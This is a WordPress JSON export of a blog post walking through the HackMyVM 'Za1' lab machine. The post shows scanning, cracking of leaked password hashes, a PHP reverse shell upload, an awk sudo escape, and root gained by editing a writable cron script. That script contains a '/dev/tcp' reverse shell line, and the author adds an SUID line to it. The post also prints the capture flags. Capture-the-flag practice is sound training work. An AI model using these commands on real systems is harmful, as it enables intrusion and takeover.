{"id":560,"date":"2024-04-14T21:11:07","date_gmt":"2024-04-14T13:11:07","guid":{"rendered":"http:\/\/162.14.82.114\/?p=560"},"modified":"2024-04-14T21:11:07","modified_gmt":"2024-04-14T13:11:07","slug":"hmv-_-za1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/560\/04\/14\/2024\/","title":{"rendered":"hmv[-_-]za1"},"content":{"rendered":"<h1>Za1<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110383.png\" alt=\"image-20240414202913983\" style=\"zoom: 33%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110385.png\" alt=\"image-20240414202926841\" style=\"zoom:33%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.9 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 36:32:5b:78:d0:f4:3c:9f:05:1a:a7:13:91:3e:38:c1 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCiszwYYyjXll\/pr+K+GGq77l6g9Z5zhJbJpC3hth0Nm+QtBaasUz2i1\/ys4WOAExSDhc+kA5BU1IpX2dWSvWsk4JWKNy9zJuHux\/g3GBy9BwLusNzPTYWeUUa9iu5mwKD4Saj1mfM7BzMZggFXcyk8rFdm8Z\/DiLs41TbYn38av1diBd160wnfG6uYIScqFQh\/i9PUoeTMEOE7cVYSpWjbiym6Xu2l79YcP3SnMvygMVJZ8lfFI2Tr5QGYmRT3COLs00caTZ5dc8PuVbp90YAAj0UafgFcTAPtOK6ZlmffZch2oVAg4TG71fXwGoQqg7oTlBgqmrHN+pkpryZ53BBf\n|   256 72:07:82:15:26:ce:13:34:e8:42:cf:da:de:e2:a7:14 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIA8M\/o11TTI8tOkNw1O1Sk4AKfP35fuoc6WHuwtRGYRgWZ9JpG3qjL9qGRR+VzTxGZw1oGPPjK+5WbakGvJlm4=\n|   256 fc:9c:66:46:86:60:1a:29:32:c6:1f:ec:b2:47:b8:74 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXqZTpsGVeofSC4FHp5n\/f1hV+SZR6B\/Mvdviej5kRK\n80\/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: Typecho 1.2.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Zacarx&#039;s blog\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.9 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     
http:\/\/172.20.10.9\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 276]\n\/index.php            (Status: 200) [Size: 6788]\n\/admin                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.9\/admin\/]\n\/install              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.9\/install\/]\n\/install.php          (Status: 302) [Size: 0] [--&gt; http:\/\/172.20.10.9\/]\n\/sql                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/sql\/]\n\/LICENSE.txt          (Status: 200) [Size: 14974]\n\/var                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/var\/]\n\/usr                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.9\/usr\/]\n\/.php                 (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.9<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.9\n+ Target Hostname:    172.20.10.9\n+ Target Port:        80\n+ Start Time:         2024-04-14 08:31:16 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.29 
(Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/admin\/login.php?action=insert&amp;username=test&amp;password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user &#039;test&#039; password &#039;test&#039; to verify. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2002-0995\n+ \/install\/: Directory indexing found.\n+ \/install\/: This might be interesting.\n+ \/sql\/: Directory indexing found.\n+ \/LICENSE.txt: License file found may identify site software.\n+ \/icons\/README: Apache default file found. 
See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/admin\/login.php: Admin login page\/section found.\n+ \/var\/: Directory indexing found.\n+ \/var\/: \/var directory has indexing enabled.\n+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host\n+ End Time:           2024-04-14 08:32:00 (GMT-4) (44 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110386.png\" alt=\"image-20240414203212148\" style=\"zoom:50%;\" \/><\/p>\n<p>Well, well. Let&#039;s look up known vulnerabilities while we are here:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ searchsploit typecho 1.2.1          \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<p>As expected, that is not the way in.<\/p>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.9\/admin<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110387.png\" alt=\"image-20240414203350805\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110388.png\" alt=\"image-20240414203433881\" style=\"zoom: 33%;\" \/><\/p>\n<h3>Inspecting the Database<\/h3>\n<p>Download the files and open them; viewed as text, each one begins with <code>SQLite format 3<\/code>:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ wget http:\/\/172.20.10.9\/sql\/new.sql                                                       \n--2024-04-14 08:38:56--  http:\/\/172.20.10.9\/sql\/new.sql\nConnecting to 172.20.10.9:80... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 102400 (100K) [application\/x-sql]\nSaving to: \u2018new.sql\u2019\n\nnew.sql                               100%[=================================================&gt;] 100.00K  --.-KB\/s    in 0.001s  \n\n2024-04-14 08:38:56 (98.1 MB\/s) - \u2018new.sql\u2019 saved [102400\/102400]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ wget http:\/\/172.20.10.9\/sql\/sercet.sql\n--2024-04-14 08:39:04--  http:\/\/172.20.10.9\/sql\/sercet.sql\nConnecting to 172.20.10.9:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 102400 (100K) [application\/x-sql]\nSaving to: \u2018sercet.sql\u2019\n\nsercet.sql                            100%[=================================================&gt;] 100.00K  --.-KB\/s    in 0s      \n\n2024-04-14 08:39:04 (423 MB\/s) - \u2018sercet.sql\u2019 saved [102400\/102400]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ head new.sql                                                           \n\ufffd\ufffdpite f&#039;\ufffd\ufffd\ufffdTypechohttps:\/\/typecho.org127.0.0.1Typecho 1.2.1\u6b22\u8fce\u52a0\u5165 Typecho \u5927\u5bb6\u65cfcommentapproved\n\ufffd\ufffd\n\ufffd\ufffd      d\ufffd\ufffd\ufffd\n\ufffd       \ufffd       \ufffd\ufffd\n                  \ufffd\n                   \ufffde\ufffdH&#039;\ufffd&#039;             \u7231\u751f\u547dstartd\ufffd\ufffdd\ufffd\ufffd\ufffd&lt;!--markdown--&gt;\u6211\u4e0d\u53bb\u60f3\uff0c\n\u662f\u5426\u80fd\u591f\u6210\u529f \uff0c\n\u65e2\u7136\u9009\u62e9\u4e86\u8fdc\u65b9 \uff0c\n\u4fbf\u53ea\u987e\u98ce\u96e8\u517c\u7a0b\u3002\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ sqlite3 new.sql          \nSQLite version 3.44.2 2023-11-24 11:41:44\nEnter &quot;.help&quot; for usage hints.\nsqlite&gt; .tables;\nError: unknown command or invalid arguments:  &quot;tables;&quot;. 
Enter &quot;.help&quot; for help\nsqlite&gt; .tables\ntypechocomments       typechometas          typechousers        \ntypechocontents       typechooptions      \ntypechofields         typechorelationships\nsqlite&gt; select * from typechousers\n   ...&gt; ;\n1|zacarx|$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.|zacarx@qq.com|http:\/\/www.zacarx.com|zacarx|1690361071|1692694072|1690364323|administrator|9ceb10d83b32879076c132c6b6712318\n2|admin|$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0|admin@11.com||admin|1690364171|1690365357|1690364540|administrator|5664b205a3c088256fdc807791061a18<\/code><\/pre>\n<h3>Cracking<\/h3>\n<p>Let&#039;s try cracking the hashes:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ echo &#039;$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.&#039; &gt; zacarx_hash       \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ echo &#039;$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0&#039; &gt; admin      \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ john zacarx_hash -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:38 6.63% (ETA: 08:52:59) 0g\/s 28358p\/s 28358c\/s 28358C\/s 5121246003..50dgirl\nSession aborted\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Za_1]\n\u2514\u2500$ john admin -w=\/usr\/share\/wordlists\/rockyou.txt \nUsing default input encoding: UTF-8\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\nCost 1 (iteration count) is 8192 for all loaded hashes\nWill run 2 OpenMP threads\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\n123456           (?)     
\n1g 0:00:00:00 DONE (2024-04-14 08:44) 25.00g\/s 4800p\/s 4800c\/s 4800C\/s 123456..november\nUse the &quot;--show --format=phpass&quot; options to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n<h3>Logging In and Uploading a Reverse Shell<\/h3>\n<p>Tried logging in, and it really was a weak password... I missed what was right under my nose...<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110389.png\" alt=\"image-20240414204527951\" style=\"zoom:50%;\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110390.png\" alt=\"image-20240414204637000\" \/><\/p>\n<p>It even has name resolution set up...<\/p>\n<p>Change the upload settings and upload a reverse shell!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110391.png\" alt=\"image-20240414204802421\" style=\"zoom:50%;\" \/><\/p>\n<p>First add a DNS entry:<\/p>\n<pre><code class=\"language-apl\">172.20.10.9    za1.hmv<\/code><\/pre>\n<p>Save it, then try the upload:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110392.png\" alt=\"image-20240414204926144\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">http:\/\/za1.hmv\/usr\/uploads\/revershell.php<\/code><\/pre>\n<p>The post is published, so trigger it. In testing I found that the shell would not connect back after the modification; it may be that I did something wrong:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110393.png\" alt=\"image-20240414205510604\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110394.png\" alt=\"image-20240414205523728\" style=\"zoom:33%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110395.png\" alt=\"image-20240414205536932\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@za_1:\/$ ls\nbin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old\nboot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz\n(remote) www-data@za_1:\/$ cd \/home\n(remote) www-data@za_1:\/home$ ls\nza_1\n(remote) www-data@za_1:\/home$ cd za_1\/\n(remote) www-data@za_1:\/home\/za_1$ ls\nuser.txt\n(remote) www-data@za_1:\/home\/za_1$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\n(remote) www-data@za_1:\/home\/za_1$ sudo -l\nMatching 
Defaults entries for www-data on za_1:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser www-data may run the following commands on za_1:\n    (za_1) NOPASSWD: \/usr\/bin\/awk<\/code><\/pre>\n<h3>awk Privilege Escalation<\/h3>\n<p>Reference: https:\/\/gtfobins.github.io\/gtfobins\/awk\/<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404142110396.png\" alt=\"image-20240414205823241\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">(remote) www-data@za_1:\/home\/za_1$ sudo -u za_1 awk &#039;BEGIN {system(&quot;\/bin\/bash&quot;)}&#039;\nza_1@za_1:~$ whoami;id\nza_1\nuid=1000(za_1) gid=1000(za_1) groups=1000(za_1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)\nza_1@za_1:~$ pwd\n\/home\/za_1\nza_1@za_1:~$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  
2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\nza_1@za_1:~$ cat user.txt\nflag{ThursD0y_v_wo_50}<\/code><\/pre>\n<h3>Escalating to root<\/h3>\n<pre><code class=\"language-bash\">za_1@za_1:~$ sudo -l\n[sudo] password for za_1: \nza_1@za_1:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/bin\/mount\n\/bin\/umount\n\/bin\/fusermount\n\/bin\/su\n\/bin\/ping\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/x86_64-linux-gnu\/lxc\/lxc-user-nic\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/at\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n\/usr\/bin\/pkexec\n\/usr\/bin\/newgidmap\n\/usr\/bin\/chfn\n\/usr\/bin\/newuidmap\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\nza_1@za_1:~$ file \/bin\/fusermount\n\/bin\/fusermount: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 2.6.32, BuildID[sha1]=3bfc1d4dff4f52bd8df25fd11a2c1b5812e2d71c, stripped\nza_1@za_1:~$ ls -la\ntotal 44\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .\ndrwxr-xr-x 3 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout\n-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache\ndrwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg\n-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root\ndrwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh\n-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful\n-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo\n-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt\nza_1@za_1:~$ cd 
.root\nza_1@za_1:~\/.root$ ls -la\ntotal 12\ndrwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .\ndrwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 ..\n-rwxrwxrwx 1 root root  117 Jul 26  2023 back.sh\nza_1@za_1:~\/.root$ cat back.sh \n#!\/bin\/bash\ncp \/var\/www\/html\/usr\/64c0dcaf26f51.db \/var\/www\/html\/sql\/new.sql\nbash -i &gt;&amp;\/dev\/tcp\/10.0.2.18\/999 0&gt;&amp;1\nza_1@za_1:~\/.root$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1113504 Apr 18  2022 \/bin\/bash   \nza_1@za_1:~\/.root$ vim back.sh \nza_1@za_1:~\/.root$ head back.sh \n#!\/bin\/bash\ncp \/var\/www\/html\/usr\/64c0dcaf26f51.db \/var\/www\/html\/sql\/new.sql\nbash -i &gt;&amp;\/dev\/tcp\/10.0.2.18\/999 0&gt;&amp;1\nchmod +s \/bin\/bash<\/code><\/pre>\n<p>\u4e0d\u77e5\u9053\u662f\u5426\u662f\u5b9a\u65f6\u4efb\u52a1\uff0c\u4f46\u662f\u65e2\u7136\u6743\u9650\u8fd9\u4e48\u9ad8\uff0c\u4e14\u6709\u8bfb\u5199\u6743\u9650\uff0c\u5148\u5199\u5165\u518d\u8bf4\uff0c\u4f20\u4e00\u4e2a<code>pspy64<\/code>\u4e0a\u53bb\u7785\u7785\uff1a<\/p>\n<pre><code class=\"language-bash\">(local) pwncat$ lpwd\n\/home\/kali\/temp\/Za_1\n(local) pwncat$ lcd ..\n(local) pwncat$                                                                                                                                         \n(remote) za_1@za_1:\/home\/za_1\/.root$ cd \/tmp\n(remote) za_1@za_1:\/tmp$ \n(local) pwncat$ upload pspy64\n.\/pspy64 \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% 
\u2022 4.5\/4.5 MB \u2022 3.6 MB\/s \u2022 0:00:00[09:04:13] uploaded 4.47MiB in 1.71 seconds                                                                                                 upload.py:76\n(local) pwncat$                                                                                                                                         \n(remote) za_1@za_1:\/tmp$ chmod +x pspy64 \n(remote) za_1@za_1:\/tmp$ .\/pspy64 \nSegmentation fault<\/code><\/pre>\n<p>I use this tool because it is convenient; of course python or nc would also work for the transfer!<\/p>\n<p>Uh, what is going on here... I also tried uploading a smaller build, but it still errored out...<\/p>\n<p>Check whether the <code>suid<\/code> bit has been added:<\/p>\n<pre><code class=\"language-bash\">(remote) za_1@za_1:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1113504 Apr 18  2022 \/bin\/bash\n(remote) za_1@za_1:\/tmp$ bash -p\n(remote) root@za_1:\/tmp# whoami;id\nroot\nuid=1000(za_1) gid=1000(za_1) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(za_1)\n(remote) root@za_1:\/tmp# cd \/root\n(remote) root@za_1:\/root# ls -la\ntotal 60\ndrwx------  6 root root 4096 Aug 22  2023 .\ndrwxr-xr-x 24 root root 4096 Jul 26  2023 ..\nlrwxrwxrwx  1 root root    9 Aug 22  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc\ndrwx------  2 root root 4096 Aug 22  2023 .cache\ndrwx------  3 root root 4096 Aug 22  2023 .gnupg\ndrwxr-xr-x  3 root root 4096 Jul 26  2023 .local\n-rw-------  1 root root  154 Jul 26  2023 .mysql_history\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root   75 Jul 26  2023 .selected_editor\n-rw-------  1 root root  137 Aug 22  2023 .sqlite_history\ndrwx------  2 root root 4096 Jul 26 
 2023 .ssh\n-rw-------  1 root root 9983 Jul 26  2023 .viminfo\n-rw-r--r--  1 root root   25 Jul 26  2023 root.txt\n(remote) root@za_1:\/root# cat root.txt \nflag{qq_group_169232653}<\/code><\/pre>\n<p>So it was a scheduled task after all; got root...<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Za1 Information Gathering Port Scan rustscan -a 172.20.10.9 -- -A PORT STATE  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-560","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=560"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560\/revisions"}],"predecessor-version":[{"id":561,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/560\/revisions\/561"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=560"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=560"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=560"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated"
:true}]}}